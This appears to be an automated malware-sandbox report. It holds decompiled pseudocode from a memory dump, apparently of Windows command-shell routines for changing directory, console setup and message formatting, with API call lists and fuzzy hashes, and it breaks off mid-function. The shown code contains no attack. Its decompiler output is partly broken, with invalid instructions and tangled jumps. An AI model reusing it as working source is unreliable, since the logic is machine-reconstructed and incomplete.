                                                      			E4A737010(WCHAR* __ebx, long __edi, long __esi, void* __eflags) {
                                                      				intOrPtr _t54;
                                                      				WCHAR* _t58;
                                                      				WCHAR* _t62;
                                                      				short _t67;
                                                      				long _t70;
                                                      				short _t71;
                                                      				long _t75;
                                                      				intOrPtr* _t82;
                                                      				WCHAR* _t86;
                                                      				signed int _t101;
                                                      				long _t102;
                                                      				WCHAR* _t112;
                                                      				short _t113;
                                                      				intOrPtr _t117;
                                                      				WCHAR* _t121;
                                                      				short* _t123;
                                                      				void* _t126;
                                                      				void* _t137;
                                                      
                                                      				_t125 = __esi;
                                                      				_t124 = __edi;
                                                      				_t111 = __ebx;
                                                      				_push(0x228);
                                                      				_push(0x4a737238);
                                                      				E4A7313E1(__ebx, __edi, __esi);
                                                      				_t112 =  *(_t126 + 8);
                                                      				_t54 =  *0x4a770664; // 0x5c
                                                      				if( *_t112 == _t54) {
                                                      					if(_t112[1] != _t54) {
                                                      						goto L2;
                                                      					}
                                                      					goto L32;
                                                      				} else {
                                                      					L2:
                                                      					_t111 = E4A7319D6(_t112);
                                                      					 *(_t126 - 0x234) = _t111;
                                                      					if(_t111 == 0) {
                                                      						L36:
                                                      						_push(8);
                                                      						L37:
                                                      						L32:
                                                      						return E4A7313CA(_t111, _t124, _t125);
                                                      					}
                                                      					 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
                                                      					_t58 = _t111;
                                                      					_t5 =  &(_t58[1]); // 0x2
                                                      					_t123 = _t5;
                                                      					do {
                                                      						_t113 =  *_t58;
                                                      						_t58 =  &(_t58[1]);
                                                      					} while (_t113 != 0);
                                                      					_t62 =  &(_t111[_t58 - _t123 >> 1]);
                                                      					while(1) {
                                                      						 *(_t126 - 0x230) = _t62;
                                                      						if(_t62 <= _t111) {
                                                      							break;
                                                      						}
                                                      						_t9 = _t62 - 2; // -2
                                                      						_t121 = _t9;
                                                      						if( *_t121 == 0x20) {
                                                      							_t62 = _t121;
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					 *_t62 = 0;
                                                      					_t124 = 0x104;
                                                      					GetCurrentDirectoryW(0x104, _t126 - 0x22c);
                                                      					_t125 = towupper;
                                                      					 *(_t126 - 0x238) = towupper( *(_t126 - 0x22c)) & 0x0000ffff;
                                                      					_t67 = 0x3d;
                                                      					 *((short*)(_t126 - 0x24)) = _t67;
                                                      					if(iswalpha( *_t111 & 0x0000ffff) == 0 || _t111[1] != 0x3a) {
                                                      						_t70 =  *(_t126 - 0x238);
                                                      					} else {
                                                      						_t70 = towupper( *_t111 & 0x0000ffff);
                                                      					}
                                                      					 *(_t126 - 0x22) = _t70;
                                                      					_t71 = 0x3a;
                                                      					 *((short*)(_t126 - 0x20)) = _t71;
                                                      					 *((short*)(_t126 - 0x1e)) = 0;
                                                      					_t75 = GetFullPathNameW(_t111, _t124, _t126 - 0x22c, _t126 - 0x230);
                                                      					if(_t75 == 0) {
                                                      						L39:
                                                      						_t125 = GetLastError();
                                                      						goto L40;
                                                      					} else {
                                                      						if(_t75 > _t124) {
                                                      							L41:
                                                      							_push(0xfffffffe);
                                                      							_push(_t126 - 0x10);
                                                      							_push(0x4a7540ac);
                                                      							L4A75219B();
                                                      							goto L32;
                                                      						}
                                                      						if( *(_t126 - 0x22c) == 0 ||  *((short*)(_t126 - 0x22a)) != 0x3a) {
                                                      							_push(0xfffffffe);
                                                      							_push(_t126 - 0x10);
                                                      							_push(0x4a7540ac);
                                                      							L4A75219B();
                                                      							_push(3);
                                                      							goto L37;
                                                      						} else {
                                                      							_t82 = _t126 - 0x22c;
                                                      							_t23 = _t82 + 2; // 0x2
                                                      							_t122 = _t23;
                                                      							do {
                                                      								_t117 =  *_t82;
                                                      								_t82 = _t82 + 2;
                                                      							} while (_t117 != 0);
                                                      							_t86 = _t126 + (_t82 - _t122 >> 1) * 2 - 0x22c;
                                                      							while(1) {
                                                      								L18:
                                                      								 *(_t126 - 0x230) = _t86;
                                                      								if(_t86 <= _t126 - 0x226) {
                                                      									break;
                                                      								}
                                                      								_t29 = _t86 - 2; // -4
                                                      								_t112 = _t29;
                                                      								_t137 =  *_t112 -  *0x4a770664; // 0x5c
                                                      								if(_t137 == 0) {
                                                      									goto L1;
                                                      								}
                                                      								break;
                                                      							}
                                                      							 *_t86 = 0;
                                                      							_t125 = GetFileAttributesW;
                                                      							if(GetFileAttributesW(_t126 - 0x22c) == 0xffffffff) {
                                                      								_t111 = GetLastError();
                                                      								if(_t111 == 2 || _t111 == 3 || _t111 == 0x7b) {
                                                      									_t111 =  *(_t126 - 0x234);
                                                      									goto L21;
                                                      								} else {
                                                      									_push(0xfffffffe);
                                                      									_push(_t126 - 0x10);
                                                      									_push(0x4a7540ac);
                                                      									L4A75219B();
                                                      									goto L32;
                                                      								}
                                                      							}
                                                      							L21:
                                                      							if( *0x4a754081 == 0 || E4A736E47(_t126 - 0x22c, _t124, 0) != 0) {
                                                      								if( *((intOrPtr*)(_t126 + 0xc)) == 2) {
                                                      									L26:
                                                      									if( *((intOrPtr*)(_t126 + 0xc)) == 0 ||  *((intOrPtr*)(_t126 + 0xc)) == 1 &&  *(_t126 - 0x238) ==  *(_t126 - 0x22)) {
                                                      										if(SetCurrentDirectoryW(_t126 - 0x22c) == 0) {
                                                      											goto L39;
                                                      										}
                                                      										goto L30;
                                                      									} else {
                                                      										L30:
                                                      										if(E4A731730(_t126 - 0x24, _t126 - 0x22c) != 0) {
                                                      											_push(0xfffffffe);
                                                      											_push(_t126 - 0x10);
                                                      											_push(0x4a7540ac);
                                                      											L4A75219B();
                                                      											goto L36;
                                                      										}
                                                      										E4A732C56(_t111, _t122, _t124, 0x4a755260, _t124, 0);
                                                      										 *(_t126 - 4) = 0xfffffffe;
                                                      										E4A737259(_t111);
                                                      										goto L32;
                                                      									}
                                                      								}
                                                      								_t101 = GetFileAttributesW(_t126 - 0x22c);
                                                      								if(_t101 == 0xffffffff) {
                                                      									_t102 = GetLastError();
                                                      									_t125 = _t102;
                                                      									if(_t102 == 2) {
                                                      										_t125 = 3;
                                                      									}
                                                      									L40:
                                                      									_push(0xfffffffe);
                                                      									_push(_t126 - 0x10);
                                                      									_push(0x4a7540ac);
                                                      									L4A75219B();
                                                      									goto L32;
                                                      								}
                                                      								if((_t101 & 0x00000410) == 0) {
                                                      									_push(0xfffffffe);
                                                      									_push(_t126 - 0x10);
                                                      									_push(0x4a7540ac);
                                                      									L4A75219B();
                                                      									goto L32;
                                                      								}
                                                      								goto L26;
                                                      							} else {
                                                      								goto L41;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L1:
                                                      				_t86 = _t112;
                                                      				goto L18;
                                                      			}






















                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6,00000000,00000001,00000000,00000000,4A7372F5,00000000), ref: 4A73708A
                                                      • towupper.MSVCRT ref: 4A73709C
                                                      • iswalpha.MSVCRT ref: 4A7370B2
                                                      • towupper.MSVCRT ref: 4A7370D1
                                                      • GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,4A736D61,00000000,00000002,0000233A,?), ref: 4A7370F5
                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 4A73717A
                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 4A7371B2
                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 4A7371E8
                                                      • _local_unwind4.MSVCRT ref: 4A749FBB
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: AttributesCurrentDirectoryFiletowupper$FullNamePath_local_unwind4iswalpha
                                                      • String ID:
                                                      • API String ID: 1128778107-0
                                                      • Opcode ID: aff3b660699e43f62688c14ad80851cf6772b7e8f63f4275a466c3a8a80cacf2
                                                      • Instruction ID: 12bd07873c4432ead2c9de2d47f96ea3536e3cb7f91fe8d5a0238139a68f9d21
                                                      • Opcode Fuzzy Hash: aff3b660699e43f62688c14ad80851cf6772b7e8f63f4275a466c3a8a80cacf2
                                                      • Instruction Fuzzy Hash: 4881DA72909119EADB70DBE0DC48AED7BB8EF45320F1241A5F915DB582E734CA4CCB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 49%
                                                      			E4A7372E9(void* __ecx, void* __edi, void* __esi, void* __eflags, int _a4) {
                                                      				char _v13;
                                                      				signed int _v16;
                                                      				int _v20;
                                                      				int _v24;
                                                      				int _v28;
                                                      				char _v32;
                                                      				char _v48;
                                                      				void* _v97;
                                                      				void* __ebp;
                                                      				void* _t40;
                                                      				char* _t44;
                                                      				int _t49;
                                                      				intOrPtr* _t53;
                                                      				signed int _t55;
                                                      				intOrPtr _t56;
                                                      				int _t59;
                                                      				int _t64;
                                                      				intOrPtr _t67;
                                                      				signed int _t71;
                                                      				signed int _t72;
                                                      				intOrPtr _t79;
                                                      				intOrPtr _t80;
                                                      				char* _t83;
                                                      				signed int _t86;
                                                      				int _t88;
                                                      				void* _t90;
                                                      				intOrPtr _t92;
                                                      				void* _t94;
                                                      				void* _t96;
                                                      				void* _t98;
                                                      				intOrPtr _t101;
                                                      				void* _t103;
                                                      				char* _t105;
                                                      				void* _t108;
                                                      				signed int _t109;
                                                      				int _t112;
                                                      				void* _t113;
                                                      				signed int* _t114;
                                                      				void* _t116;
                                                      				void* _t117;
                                                      				void* _t118;
                                                      				void* _t120;
                                                      				void* _t121;
                                                      				signed int _t131;
                                                      
                                                      				_t94 = __ecx;
                                                      				do {
                                                      				} while (E4A73727F(__eflags, 0) == 0);
                                                      				exit(_a4);
                                                      				asm("int3");
                                                      				_t117 = _t120;
                                                      				_t121 = _t120 - 0x28;
                                                      				_v28 = 0;
                                                      				_t40 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
                                                      				 *0x4a75418c = _t40;
                                                      				E4A731690();
                                                      				__imp__HeapSetInformation(0, 1, 0, 0, 0, __edi, __esi, _t90, _t116);
                                                      				E4A737B0D(_t94,  &_v32);
                                                      				_t44 =  &_v13;
                                                      				_push(0x4a754210);
                                                      				_push(_t44);
                                                      				 *0x4a754086 = 1;
                                                      				 *0x4a7541d8 = _t44;
                                                      				if(E4A737D20() == 1) {
                                                      					 *0x4a754086 = 0;
                                                      				}
                                                      				E4A737BDB();
                                                      				_t105 =  &_v48;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_v20 = 0;
                                                      				_t49 = E4A7384E3( &_v48, 4);
                                                      				_t112 = _t49;
                                                      				if(_v28 == 1) {
                                                      					_push(0);
                                                      					E4A7399E1(_t94);
                                                      					_t96 = 0x40002729;
                                                      					_push(0);
                                                      					E4A74BE8D();
                                                      					_push(0xff);
                                                      					_t49 = E4A7372E9(_t96, _t105, _t112, __eflags);
                                                      				}
                                                      				_t113 = GetCPInfo;
                                                      				if(_t112 != 0) {
                                                      					_push(0);
                                                      					L4A731BC7();
                                                      					_t103 = 0x4a754b40;
                                                      					if(_t49 != 0) {
                                                      						_v24 = 1;
                                                      						__eflags =  *0x4a7540e4; // 0x0
                                                      						if(__eflags != 0) {
                                                      							_v20 = 0xff;
                                                      						}
                                                      					}
                                                      					if(_v24 == 0) {
                                                      						_v16 = 0;
                                                      						do {
                                                      							_t82 =  *((intOrPtr*)(_t117 + _v16 * 4 - 0x28));
                                                      							if( *((intOrPtr*)(_t117 + _v16 * 4 - 0x28)) != 0) {
                                                      								_t83 = E4A731BD2(__eflags, 1, _t82,  *0x4a754104);
                                                      								_t105 = _t83;
                                                      								__eflags = _t105 - 1;
                                                      								if(__eflags == 0) {
                                                      									_push(_t83);
                                                      									E4A7372E9(_t103, _t105, _t113, __eflags);
                                                      								}
                                                      								__eflags = _t105 - 0xffffffff;
                                                      								if(__eflags == 0) {
                                                      									_push(0);
                                                      									E4A7372E9(_t103, _t105, _t113, __eflags);
                                                      								}
                                                      								_t86 = E4A731492(0, _t105);
                                                      								__eflags = _t86;
                                                      								if(__eflags != 0) {
                                                      									_v20 = _t86;
                                                      								}
                                                      							}
                                                      							_v16 = _v16 + 1;
                                                      						} while (_v16 < 3);
                                                      						E4A731605();
                                                      						_t88 = GetConsoleOutputCP();
                                                      						 *0x4a7541b8 = _t88;
                                                      						GetCPInfo(_t88, 0x4a754260);
                                                      						_push(0);
                                                      						_t49 = E4A731690();
                                                      					}
                                                      					_t131 =  *0x4a7540e4; // 0x0
                                                      					if(_t131 != 0) {
                                                      						_push(_v20);
                                                      						_t49 = E4A7372E9(_t103, _t105, _t113, _t131);
                                                      					}
                                                      					 *0x4a7540e0 = 0;
                                                      				}
                                                      				_push(0);
                                                      				L4A731BC7();
                                                      				_t98 = 0x4a754b40;
                                                      				_v20 = _t49;
                                                      				if(_t49 == 0) {
                                                      					L16:
                                                      					if(_v28 == 2) {
                                                      						_push(0);
                                                      						E4A7399E1(_t98);
                                                      						_t98 = 0x40002729;
                                                      						_push(0);
                                                      						_t53 = E4A74BE8D();
                                                      						_push(0xff);
                                                      						L47:
                                                      						 *_t53 =  *_t53 + _t53;
                                                      						_t49 = _t53 + _t98 + 1;
                                                      						asm("cld");
                                                      						asm("invalid");
                                                      					}
                                                      					_t55 = E4A733B03(_t49, _t98, 0);
                                                      					asm("sbb edi, edi");
                                                      					_t108 =  ~_t55 + 3;
                                                      					_t134 = _t108 - 3;
                                                      					if(_t108 == 3) {
                                                      						__imp___setmode(0, 0x8000);
                                                      						_pop(_t98);
                                                      					}
                                                      					_t56 = E4A73C2F7(_t98, 0);
                                                      					while(1) {
                                                      						L19:
                                                      						 *0x4a7540b8 = 0;
                                                      						E4A731E6C(_t56);
                                                      						_t56 = E4A731BD2(_t134, _t108, 0, 0);
                                                      						_v32 = _t56;
                                                      						if(_t56 == 1) {
                                                      							continue;
                                                      						}
                                                      						L49:
                                                      						_t136 = _t56 - 0xffffffff;
                                                      						if(_t56 != 0xffffffff) {
                                                      							E4A731E6C(_t56);
                                                      							_t59 = GetConsoleOutputCP();
                                                      							 *0x4a7541b8 = _t59;
                                                      							GetCPInfo(_t59, 0x4a754260);
                                                      							_push(0);
                                                      							E4A731690();
                                                      							E4A731492(0, _v32);
                                                      							 *0x4a754083 = 0;
                                                      							E4A731605();
                                                      							_t64 = GetConsoleOutputCP();
                                                      							 *0x4a7541b8 = _t64;
                                                      							GetCPInfo(_t64, 0x4a754260);
                                                      							_push(0);
                                                      							_t56 = E4A731690();
                                                      							do {
                                                      								goto L19;
                                                      							} while (_t56 == 1);
                                                      							goto L49;
                                                      						}
                                                      						_push(0);
                                                      						_t53 = E4A7372E9(_t98, _t108, _t113, _t136);
                                                      						goto L47;
                                                      						L19:
                                                      						 *0x4a7540b8 = 0;
                                                      						E4A731E6C(_t56);
                                                      						_t56 = E4A731BD2(_t134, _t108, 0, 0);
                                                      						_v32 = _t56;
                                                      					}
                                                      				}
                                                      				__eflags = _t49 - 2;
                                                      				if(__eflags != 0) {
                                                      					goto L16;
                                                      				}
                                                      				E4A7372E9(_t98, _t105, _t113, __eflags);
                                                      				asm("int3");
                                                      				_t118 = _t121;
                                                      				L28();
                                                      				__imp__longjmp(0x4a754b40,  *((intOrPtr*)(_t118 + 8)), _t117, 0);
                                                      				asm("int3");
                                                      				_push(_t118);
                                                      				_push(_t98);
                                                      				_push(0);
                                                      				_t92 = 0;
                                                      				 *0x4a754120 = 0;
                                                      				__eflags =  *0x4a7540b4 - _t92; // 0x0
                                                      				if(__eflags != 0) {
                                                      					_push(0);
                                                      					L4A736BA1();
                                                      					_t67 =  *0x4a7541e0; // 0x0
                                                      					_push(0);
                                                      					 *0x4a75408c = _t67;
                                                      					 *0x4a7540b8 = 0;
                                                      					E4A73DA73();
                                                      					 *0x4a7540b4 = 0;
                                                      				}
                                                      				__eflags =  *0x4a7540cc - _t92; // 0x0
                                                      				if(__eflags == 0) {
                                                      					_t79 =  *0x4a7540bc; // 0x0
                                                      					 *0x4a7540c4 = _t79;
                                                      					_t80 =  *0x4a7540c0; // 0x0
                                                      					 *0x4a7540c8 = _t80;
                                                      					 *0x4a7540cc = 1;
                                                      				}
                                                      				 *0x4a7540bc = _t92;
                                                      				 *0x4a7540c0 = _t92;
                                                      				while(1) {
                                                      					__eflags =  *0x4a7540fc - _t92; // 0x0
                                                      					if(__eflags == 0) {
                                                      						break;
                                                      					}
                                                      					E4A734738();
                                                      				}
                                                      				_push(_t113);
                                                      				_push(_t105);
                                                      				E4A74383B(_t98);
                                                      				_t109 = 0;
                                                      				__eflags = 0;
                                                      				do {
                                                      					_t114 = 0x4a75487c + _t109 * 4;
                                                      					__eflags =  *_t114 - _t92;
                                                      					if( *_t114 != _t92) {
                                                      						_v20 = 1;
                                                      						do {
                                                      							_t71 = _v20;
                                                      							__eflags =  *_t114 & _t71;
                                                      							if(( *_t114 & _t71) != 0) {
                                                      								__eflags = _t109;
                                                      								if(_t109 != 0) {
                                                      									L58:
                                                      									__eflags = (_t109 << 5) + _t92;
                                                      									E4A733AB3((_t109 << 5) + _t92);
                                                      								} else {
                                                      									__eflags = _t92 - 2;
                                                      									if(_t92 > 2) {
                                                      										goto L58;
                                                      									}
                                                      								}
                                                      							}
                                                      							_v20 = _v20 << 1;
                                                      							_t92 = _t92 + 1;
                                                      							__eflags = _t92 - 0x20;
                                                      						} while (_t92 < 0x20);
                                                      						_t92 = 0;
                                                      					}
                                                      					_t109 = _t109 + 1;
                                                      					__eflags = _t109 - 3;
                                                      				} while (_t109 < 3);
                                                      				while(1) {
                                                      					_t72 =  *0x4a754134; // 0x0
                                                      					__eflags = _t72 - _t92;
                                                      					if(_t72 == _t92) {
                                                      						break;
                                                      					}
                                                      					_t101 =  *0x4a75412c; // 0x0
                                                      					E4A732F5C( *((intOrPtr*)(_t101 + _t72 * 4 - 4)));
                                                      				}
                                                      				return E4A731605();
                                                      			}

                                                      APIs
                                                      • exit.MSVCRT ref: 4A7372FC
                                                      • GetCurrentThreadId.KERNEL32(00000000,00000000,00000000), ref: 4A737318
                                                      • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 4A737325
                                                      • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 4A73733B
                                                      • _setjmp3.MSVCRT ref: 4A7373A5
                                                      • GetConsoleOutputCP.KERNEL32 ref: 4A7373D9
                                                      • GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A7373EA
                                                      • _setjmp3.MSVCRT ref: 4A73740E
                                                        • Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
                                                        • Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17
                                                      • _setmode.MSVCRT ref: 4A743621
                                                        • Part of subcall function 4A73C2F7: SetConsoleTitleW.KERNEL32(?), ref: 4A73C3E1
                                                        • Part of subcall function 4A73C2F7: LocalFree.KERNEL32(?,00000000,00000000,?,-00000003,74EC5129,00000000), ref: 4A73C420
                                                        • Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
                                                        • Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85
                                                        • Part of subcall function 4A731BD2: _setjmp3.MSVCRT ref: 4A731BFB
                                                      • GetConsoleOutputCP.KERNEL32 ref: 4A7476CE
                                                      • GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A7476DF
                                                      • GetConsoleOutputCP.KERNEL32 ref: 4A7476FB
                                                      • GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A74770C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Console$InfoOutput_setjmp3$CriticalSectionThread$CurrentEnterFileFreeHeapInformationLeaveLocalOpenTitleType_get_osfhandle_setmodeexit
                                                      • String ID: hRtJ:#
                                                      • API String ID: 2992786541-153624809
                                                      • Opcode ID: 4cd7f0441372827eaa0c331159f999d4e6ffb4060c61b9ebd058cc19c4ab3549
                                                      • Instruction ID: aa11f926371b94ab5968d6aadbd5edad1155b12f4fe5bf8c49bba846a9ed4633
                                                      • Opcode Fuzzy Hash: 4cd7f0441372827eaa0c331159f999d4e6ffb4060c61b9ebd058cc19c4ab3549
                                                      • Instruction Fuzzy Hash: 5051F5F184DA5ABADB70DBB4CC8999E3FBDDB05250F134416E115EA843DB34984CCB2A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E4A7398A5(signed int __edx, long _a4, char* _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                      				signed int _v8;
                                                      				char _v40;
                                                      				short _v104;
                                                      				signed int _v108;
                                                      				intOrPtr* _v112;
                                                      				void* _v116;
                                                      				char* _v120;
                                                      				char _v124;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t36;
                                                      				signed int _t43;
                                                      				WCHAR* _t50;
                                                      				void* _t54;
                                                      				signed short* _t56;
                                                      				signed int _t58;
                                                      				va_list* _t61;
                                                      				signed int _t68;
                                                      				char* _t69;
                                                      				intOrPtr* _t70;
                                                      				signed int _t72;
                                                      				void* _t73;
                                                      				WCHAR* _t74;
                                                      				signed int _t75;
                                                      
                                                      				_t72 = __edx;
                                                      				_t36 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t36 ^ _t75;
                                                      				_t73 = FormatMessageW;
                                                      				_v112 = _a16;
                                                      				_t74 = 0x4a764640;
                                                      				if(_a4 == 0x13d || FormatMessageW(0x1a00, 0, _a4, 0, 0x4a764640, 0x2000, 0) == 0) {
                                                      					__imp___ultoa(_a4,  &_v40, 0x10);
                                                      					_t43 = E4A734B8D(GetACP());
                                                      					asm("sbb eax, eax");
                                                      					MultiByteToWideChar(0,  ~( ~_t43),  &_v40, 0xffffffff,  &_v104, 0x20);
                                                      					_v124 =  &_v104;
                                                      					_v120 = L"Application";
                                                      					if(_a4 < 0x2328) {
                                                      						_v120 = L"System";
                                                      					}
                                                      					_push( &_v124);
                                                      					_push(0x2000);
                                                      					_push(_t74);
                                                      					_push(0);
                                                      					_push(0x13d);
                                                      					_push(0);
                                                      					_push(0x3000);
                                                      					goto L9;
                                                      				} else {
                                                      					_v108 = _v108 & 0x00000000;
                                                      					_t54 = E4A7318EB(0x4a764640, 0x25);
                                                      					if(_t54 == 0) {
                                                      						L8:
                                                      						_push(_v112);
                                                      						_push(0x2000);
                                                      						_push(_t74);
                                                      						_push(0);
                                                      						_push(_a4);
                                                      						_push(0);
                                                      						_push(0x1800);
                                                      						L9:
                                                      						_t74 = FormatMessageW();
                                                      						L10:
                                                      						_t50 = _t74;
                                                      						L11:
                                                      						return E4A7313A9(_t50, 0x2000, _v8 ^ _t75, _t72, _t73, _t74);
                                                      					} else {
                                                      						goto L3;
                                                      					}
                                                      					do {
                                                      						L3:
                                                      						_t56 = _t54 + 2;
                                                      						_t68 =  *_t56 & 0x0000ffff;
                                                      						if(_t68 < 0x31 || _t68 > 0x39) {
                                                      							if(_t68 == 0x25) {
                                                      								_t56 =  &(_t56[1]);
                                                      							}
                                                      						} else {
                                                      							_v108 = _v108 + 1;
                                                      						}
                                                      						_t54 = E4A7318EB(_t56, 0x25);
                                                      					} while (_t54 != 0);
                                                      					_t58 = _v108;
                                                      					if(_t58 > _a12) {
                                                      						_t61 = HeapAlloc(GetProcessHeap(), 0, _t58 << 2);
                                                      						_t72 = 0;
                                                      						_v116 = _t61;
                                                      						if(_t61 != 0) {
                                                      							if(_v108 <= 0) {
                                                      								L25:
                                                      								_t74 = FormatMessageW(0x3800, 0, _a4, 0, _t74, 0x2000, _t61);
                                                      								HeapFree(GetProcessHeap(), 0, _v116);
                                                      								goto L10;
                                                      							} else {
                                                      								goto L21;
                                                      							}
                                                      							do {
                                                      								L21:
                                                      								if(_t72 >= _a12) {
                                                      									_t69 = _a8;
                                                      								} else {
                                                      									_t70 = _v112;
                                                      									 *_t70 =  *_t70 + 4;
                                                      									_t69 =  *( *_t70 - 4);
                                                      								}
                                                      								_t61[_t72] = _t69;
                                                      								_t72 = _t72 + 1;
                                                      							} while (_t72 < _v108);
                                                      							goto L25;
                                                      						}
                                                      						_t50 = 0;
                                                      						goto L11;
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      			}

                                                      APIs
                                                      • FormatMessageW.KERNEL32(00001A00,00000000,0000013D,00000000,4A764640,00002000,00000000,00000000,74EC14B9,00000000), ref: 4A7398EC
                                                        • Part of subcall function 4A7318EB: wcschr.MSVCRT ref: 4A731900
                                                      • FormatMessageW.KERNEL32(00001800,00000000,0000013D,00000000,4A764640,00002000,?,4A764640,00000025), ref: 4A739943
                                                      • _ultoa.MSVCRT ref: 4A749840
                                                      • GetACP.KERNEL32(?,000000FF,?,00000020), ref: 4A749855
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000), ref: 4A74986A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                      • String ID: @FvJ$Application$System$hRtJ:#
                                                      • API String ID: 3538039442-140189394
                                                      • Opcode ID: e58e512da0ae7e83d8a5d34d5c4180b4440bb595789d948938549675a8326f06
                                                      • Instruction ID: b8bd13090a7df968a3c01c4d1aed2db2cdc6608c96c3452c87ce21b5fa06b16d
                                                      • Opcode Fuzzy Hash: e58e512da0ae7e83d8a5d34d5c4180b4440bb595789d948938549675a8326f06
                                                      • Instruction Fuzzy Hash: FB415D71A49209AFEB70DEA4CC49FEE7BBCEB45792F224115F506DB182D6709D48CB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E4A74CB35(void* __edx, void* __edi, void* __esi, char _a4) {
                                                      				signed int _v8;
                                                      				char _v2056;
                                                      				char _v2057;
                                                      				char _v2058;
                                                      				wchar_t* _v2064;
                                                      				signed int _v2068;
                                                      				wchar_t* _v2072;
                                                      				long _v2076;
                                                      				void* _v2080;
                                                      				void* _v2084;
                                                      				long _v2088;
                                                      				void* __ebx;
                                                      				signed int _t45;
                                                      				void* _t48;
                                                      				signed int _t50;
                                                      				wchar_t* _t51;
                                                      				short* _t53;
                                                      				void* _t56;
                                                      				void* _t58;
                                                      				signed int _t59;
                                                      				void* _t60;
                                                      				signed int _t61;
                                                      				signed int _t67;
                                                      				signed int _t68;
                                                      				short* _t72;
                                                      				long _t75;
                                                      				long _t78;
                                                      				wchar_t* _t81;
                                                      				wchar_t* _t82;
                                                      				wchar_t* _t83;
                                                      				signed int _t84;
                                                      				short _t87;
                                                      				signed short* _t88;
                                                      				signed int _t98;
                                                      				void* _t106;
                                                      				long _t108;
                                                      				signed int _t113;
                                                      
                                                      				_t110 = __esi;
                                                      				_t107 = __edi;
                                                      				_t106 = __edx;
                                                      				_t45 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t45 ^ _t113;
                                                      				_t2 =  &_a4; // 0x4a745473
                                                      				_v2058 = 0;
                                                      				_v2057 = 0;
                                                      				_t48 = E4A7319D6( *_t2);
                                                      				_t87 = 0;
                                                      				if(_t48 != 0) {
                                                      					_t88 = E4A732D9B(_t48);
                                                      					_t50 =  *_t88 & 0x0000ffff;
                                                      					_v2072 = _t88;
                                                      					__eflags = _t50;
                                                      					if(_t50 != 0) {
                                                      						_push(__esi);
                                                      						_push(__edi);
                                                      						_t108 = 0x22;
                                                      						__eflags = _t50 - _t108;
                                                      						if(_t50 == _t108) {
                                                      							_t83 = E4A732D9B( &(_t88[1]));
                                                      							_v2072 = _t83;
                                                      							_t84 = wcsrchr(_t83, _t108);
                                                      							__eflags = _t84;
                                                      							if(_t84 != 0) {
                                                      								__eflags = 0;
                                                      								 *_t84 = 0;
                                                      							}
                                                      						}
                                                      						_t51 = wcschr(_v2072, 0x3d);
                                                      						_pop(_t90);
                                                      						__eflags = _t51 - _t87;
                                                      						if(_t51 != _t87) {
                                                      							_t90 = 0;
                                                      							 *_t51 = 0;
                                                      							_t53 = E4A732D9B( &(_t51[0]));
                                                      							_v2064 = _t53;
                                                      							__eflags =  *_t53 - _t108;
                                                      							if( *_t53 == _t108) {
                                                      								_t81 = E4A732D9B(_t53 + 2);
                                                      								_v2064 = _t81;
                                                      								_t82 = wcsrchr(_t81, _t108);
                                                      								_pop(_t90);
                                                      								__eflags = _t82 - _t87;
                                                      								if(_t82 != _t87) {
                                                      									_t90 = 0;
                                                      									__eflags = 0;
                                                      									 *_t82 = 0;
                                                      								}
                                                      								_t53 = _v2064;
                                                      							}
                                                      							__eflags =  *_t53 - 0x3d;
                                                      							if( *_t53 == 0x3d) {
                                                      								goto L8;
                                                      							} else {
                                                      								_t58 = GetStdHandle(0xfffffff5);
                                                      								_v2084 = _t58;
                                                      								_t59 = GetConsoleMode(_t58,  &_v2088);
                                                      								_t87 = SetConsoleMode;
                                                      								__eflags = _t59;
                                                      								if(_t59 != 0) {
                                                      									_t78 = _v2088 | 0x00000001;
                                                      									__eflags = _t78;
                                                      									_v2058 = 1;
